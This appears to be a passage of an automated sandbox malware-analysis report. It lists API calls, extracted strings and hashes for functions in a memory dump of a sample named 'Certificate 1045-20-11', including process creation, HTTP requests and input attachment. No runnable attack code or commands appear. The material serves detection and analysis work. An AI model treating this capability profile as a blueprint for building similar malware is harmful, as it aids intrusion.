                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00884FEB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                • String ID:
                                                                                • API String ID: 4176008265-0
                                                                                • Opcode ID: ea792acc36829e8cd32496d10f4d1af901d036fe4558b6951f54249168993063
                                                                                • Instruction ID: 4c82d0d504536bb21ec062c1a068caf3cc8ecdce84a8cdbc6b06ac76dea6c3b9
                                                                                • Opcode Fuzzy Hash: ea792acc36829e8cd32496d10f4d1af901d036fe4558b6951f54249168993063
                                                                                • Instruction Fuzzy Hash: 65619F7290024AAFDB21EFA8DC84EAEBBB8FB05308F14115DF941E7251DB31AD45DB21
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008A9C98
                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008A9C9B
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 008A9CBF
                                                                                • _memset.LIBCMT ref: 008A9CD0
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008A9CE2
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008A9D5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 830647256-0
                                                                                • Opcode ID: 4e126ed65f72b0345041e33e29d368f0afd3feb37de92576fabc0270520ed0aa
                                                                                • Instruction ID: 6fba8d395345c5a53283facc0f7513a6f67123d376dc0d23ab90c1ce07e80530
                                                                                • Opcode Fuzzy Hash: 4e126ed65f72b0345041e33e29d368f0afd3feb37de92576fabc0270520ed0aa
                                                                                • Instruction Fuzzy Hash: 11618A75900208AFEB10DFA8CC81EEEB7B8FB0A714F14015AFA45E7292D774A941DB50
                                                                                APIs
                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 008794FE
                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00879549
                                                                                • VariantInit.OLEAUT32(?), ref: 0087955B
                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0087957B
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 008795BE
                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 008795D2
                                                                                • VariantClear.OLEAUT32(?), ref: 008795E7
                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 008795F4
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008795FD
                                                                                • VariantClear.OLEAUT32(?), ref: 0087960F
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0087961A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID:
                                                                                • API String ID: 2706829360-0
                                                                                APIs
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • CoInitialize.OLE32 ref: 0089ADF6
                                                                                • CoUninitialize.OLE32 ref: 0089AE01
                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,008CD8FC,?), ref: 0089AE61
                                                                                • IIDFromString.OLE32(?,?), ref: 0089AED4
                                                                                • VariantInit.OLEAUT32(?), ref: 0089AF6E
                                                                                • VariantClear.OLEAUT32(?), ref: 0089AFCF
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                • API String ID: 834269672-1287834457
                                                                                APIs
                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00898168
                                                                                • inet_addr.WSOCK32(?,?,?), ref: 008981AD
                                                                                • gethostbyname.WSOCK32(?), ref: 008981B9
                                                                                • IcmpCreateFile.IPHLPAPI ref: 008981C7
                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00898237
                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0089824D
                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008982C2
                                                                                • WSACleanup.WSOCK32 ref: 008982C8
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                • String ID: Ping
                                                                                • API String ID: 1028309954-2246546115
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008A9E5B
                                                                                • CreateMenu.USER32 ref: 008A9E76
                                                                                • SetMenu.USER32(?,00000000), ref: 008A9E85
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008A9F12
                                                                                • IsMenu.USER32(?), ref: 008A9F28
                                                                                • CreatePopupMenu.USER32 ref: 008A9F32
                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008A9F63
                                                                                • DrawMenuBar.USER32 ref: 008A9F71
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                • String ID: 0
                                                                                • API String ID: 176399719-4108050209
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0088E396
                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0088E40C
                                                                                • GetLastError.KERNEL32 ref: 0088E416
                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0088E483
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                • API String ID: 4194297153-14809454
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0087B98C
                                                                                • GetDlgCtrlID.USER32 ref: 0087B997
                                                                                • GetParent.USER32 ref: 0087B9B3
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0087B9B6
                                                                                • GetDlgCtrlID.USER32(?), ref: 0087B9BF
                                                                                • GetParent.USER32(?), ref: 0087B9DB
                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0087B9DE
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 1383977212-1403004172
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0087BA73
                                                                                • GetDlgCtrlID.USER32 ref: 0087BA7E
                                                                                • GetParent.USER32 ref: 0087BA9A
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0087BA9D
                                                                                • GetDlgCtrlID.USER32(?), ref: 0087BAA6
                                                                                • GetParent.USER32(?), ref: 0087BAC2
                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0087BAC5
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 1383977212-1403004172
                                                                                APIs
                                                                                • GetParent.USER32 ref: 0087BAE3
                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 0087BAF8
                                                                                • _wcscmp.LIBCMT ref: 0087BB0A
                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0087BB85
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                • API String ID: 1704125052-3381328864
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0089B2D5
                                                                                • CoInitialize.OLE32(00000000), ref: 0089B302
                                                                                • CoUninitialize.OLE32 ref: 0089B30C
                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 0089B40C
                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 0089B539
                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0089B56D
                                                                                • CoGetObject.OLE32(?,00000000,008CD91C,?), ref: 0089B590
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 0089B5A3
                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0089B623
                                                                                • VariantClear.OLEAUT32(008CD91C), ref: 0089B633
                                                                                Similarity
                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                • String ID:
                                                                                • API String ID: 2395222682-0
                                                                                APIs
                                                                                • __swprintf.LIBCMT ref: 008867FD
                                                                                • __swprintf.LIBCMT ref: 0088680A
                                                                                  • Part of subcall function 0086172B: __woutput_l.LIBCMT ref: 00861784
                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 00886834
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00886840
                                                                                • LockResource.KERNEL32(00000000), ref: 0088684D
                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 0088686D
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0088687F
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0088688E
                                                                                • LockResource.KERNEL32(?), ref: 0088689A
                                                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 008868F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                • String ID:
                                                                                • API String ID: 1433390588-0
                                                                                • Opcode ID: c72c49e1acde24d28bc493052eb09ce97f9daea639d4b2013f9c99454b96966b
                                                                                • Instruction ID: 2a6d51f2846677274f02cf9e6ab9d7b7bd47bfa24cf0499497264a6b239438d7
                                                                                • Opcode Fuzzy Hash: c72c49e1acde24d28bc493052eb09ce97f9daea639d4b2013f9c99454b96966b
                                                                                • Instruction Fuzzy Hash: 66316DB190021AAFDB11AFA0DD49EBB7BB8FF08341F008435F916E2150E734E961DBA0
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00884047
                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008830A5,?,00000001), ref: 0088405B
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00884062
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008830A5,?,00000001), ref: 00884071
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00884083
                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,008830A5,?,00000001), ref: 0088409C
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008830A5,?,00000001), ref: 008840AE
                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008830A5,?,00000001), ref: 008840F3
                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,008830A5,?,00000001), ref: 00884108
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,008830A5,?,00000001), ref: 00884113
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                • String ID:
                                                                                • API String ID: 2156557900-0
                                                                                • Opcode ID: 17c27c606e7094ec357c489598f5b230c68ea02766d1d85d4e94d15d13a2d0c6
                                                                                • Instruction ID: 0af9d28f17690720b2ff86e6b78b070224424d055f51496e49cc146b14af07e3
                                                                                • Opcode Fuzzy Hash: 17c27c606e7094ec357c489598f5b230c68ea02766d1d85d4e94d15d13a2d0c6
                                                                                • Instruction Fuzzy Hash: F831CE76510216AFEB10EF54DC89F6AB7BDFB60311F10D019FD05E6291CBB49A80CBA0
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 0085B496
                                                                                • SetTextColor.GDI32(?,000000FF), ref: 0085B4A0
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0085B4B5
                                                                                • GetStockObject.GDI32(00000005), ref: 0085B4BD
                                                                                • GetClientRect.USER32(?), ref: 008BDD63
                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 008BDD7A
                                                                                • GetWindowDC.USER32(?), ref: 008BDD86
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 008BDD95
                                                                                • ReleaseDC.USER32(?,00000000), ref: 008BDDA7
                                                                                • GetSysColor.USER32(00000005), ref: 008BDDC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                • String ID:
                                                                                • API String ID: 3430376129-0
                                                                                • Opcode ID: 5822eef6ade70dfc5475528dca2d72e560ad6fdaa84ee0c93d2f561ae705d2db
                                                                                • Instruction ID: bbd96e265957f6f9b9a8f0ddbcd53d09783ff005c1c7a1846931a97314df21b3
                                                                                • Opcode Fuzzy Hash: 5822eef6ade70dfc5475528dca2d72e560ad6fdaa84ee0c93d2f561ae705d2db
                                                                                • Instruction Fuzzy Hash: 80114931500305FFDB216BA4EC08FE97BB1FB14326F148675FA66A51E2DB314941EB21
                                                                                APIs
                                                                                • EnumChildWindows.USER32(?,0087CF50), ref: 0087CE90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ChildEnumWindows
                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                • API String ID: 3555792229-1603158881
                                                                                • Opcode ID: 609632cb6baeebe3f7d5302f8cbd1a140afb8110487aeb9c94c2c63427d76844
                                                                                • Instruction ID: 91e6d11b41d3e1c17bb87214892004c9d5fa497f3228bf5e937a0afad0cc90e5
                                                                                • Opcode Fuzzy Hash: 609632cb6baeebe3f7d5302f8cbd1a140afb8110487aeb9c94c2c63427d76844
                                                                                • Instruction Fuzzy Hash: 2B91BF3160060AAACB18DFA4C882BEAFB74FF04310F54C519E95DE7155DF30E999CBA1
                                                                                APIs
                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008430DC
                                                                                • CoUninitialize.OLE32(?,00000000), ref: 00843181
                                                                                • UnregisterHotKey.USER32(?), ref: 008432A9
                                                                                • DestroyWindow.USER32(?), ref: 008B5079
                                                                                • FreeLibrary.KERNEL32(?), ref: 008B50F8
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008B5125
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                • String ID: close all
                                                                                • API String ID: 469580280-3243417748
                                                                                • Opcode ID: f4373706a7fe89c4f86d591c2f67099d6a251f2dd2651d8e15ea759e0f07b108
                                                                                • Instruction ID: 2087147a9ea6edf0bb02dae22f53c3fbdbc2464d5c4805996e23a6ccaf03820f
                                                                                • Opcode Fuzzy Hash: f4373706a7fe89c4f86d591c2f67099d6a251f2dd2651d8e15ea759e0f07b108
                                                                                • Instruction Fuzzy Hash: 4E91183060061ACFC715EF28C895BA8F3B4FF14305F5482A9E50AE7262DB30AE5ACF55
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 0085CC15
                                                                                  • Part of subcall function 0085CCCD: GetClientRect.USER32(?,?), ref: 0085CCF6
                                                                                  • Part of subcall function 0085CCCD: GetWindowRect.USER32(?,?), ref: 0085CD37
                                                                                  • Part of subcall function 0085CCCD: ScreenToClient.USER32(?,?), ref: 0085CD5F
                                                                                • GetDC.USER32 ref: 008BD137
                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008BD14A
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 008BD158
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 008BD16D
                                                                                • ReleaseDC.USER32(?,00000000), ref: 008BD175
                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008BD200
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                • String ID: U
                                                                                • API String ID: 4009187628-3372436214
                                                                                • Opcode ID: b3ecbed925828196bd6ff8cc8e720e3a2190393368e4d2229e9b06218917b8aa
                                                                                • Instruction ID: a042f4ec4b7792df834f1200a49c5b503298ded002923d56fbd02dbb68a3e3e3
                                                                                • Opcode Fuzzy Hash: b3ecbed925828196bd6ff8cc8e720e3a2190393368e4d2229e9b06218917b8aa
                                                                                • Instruction Fuzzy Hash: 4071AC30400309EFCF219F68C881AEA7BB5FF48325F18426AED55DA2A6E7319C45DF61
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008945FF
                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0089462B
                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0089466D
                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00894682
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0089468F
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008946BF
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00894706
                                                                                  • Part of subcall function 00895052: GetLastError.KERNEL32(?,?,008943CC,00000000,00000000,00000001), ref: 00895067
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                • String ID:
                                                                                • API String ID: 1241431887-3916222277
                                                                                • Opcode ID: 16a528417d3e13ad298d455c2a9ecede8e7c7517129bdb54c9f61d23109d95c9
                                                                                • Instruction ID: 1550975acc7967e454823b37c7cb412c996d356006ab9d72fc8211b7b2991972
                                                                                • Opcode Fuzzy Hash: 16a528417d3e13ad298d455c2a9ecede8e7c7517129bdb54c9f61d23109d95c9
                                                                                • Instruction Fuzzy Hash: 98419DB1501208BFEF02AF94CC89FBB77ACFF09304F08512AFA05DA141D7B099468BA4
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,008DDC00), ref: 0089B715
                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,008DDC00), ref: 0089B749
                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0089B8C1
                                                                                • SysFreeString.OLEAUT32(?), ref: 0089B8EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                • String ID:
                                                                                • API String ID: 560350794-0
                                                                                • Opcode ID: 533929830105be48cdfc075945f230eb0a95832fcd89e7ff17eaf2716aaf3566
                                                                                • Instruction ID: 090944b7c42c8b1abc5e9e8437526882351369abfd92a71e6bf23cb8d17f97e5
                                                                                • Opcode Fuzzy Hash: 533929830105be48cdfc075945f230eb0a95832fcd89e7ff17eaf2716aaf3566
                                                                                • Instruction Fuzzy Hash: 21F12871A00219AFCF04EF94D984EAEBBB9FF88315F148468F915EB250DB31AE41CB50
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008A24F5
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008A2688
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008A26AC
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008A26EC
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008A270E
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008A286F
                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008A28A1
                                                                                • CloseHandle.KERNEL32(?), ref: 008A28D0
                                                                                • CloseHandle.KERNEL32(?), ref: 008A2947
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                • String ID:
                                                                                • API String ID: 4090791747-0
                                                                                • Opcode ID: c8514bce4ed829e28d61defc204832adf91525ce078c8563f5a588666398dc6e
                                                                                • Instruction ID: d6b059057b59750d69a142d687e6fd7101758df5d83220f99978b176a5a02453
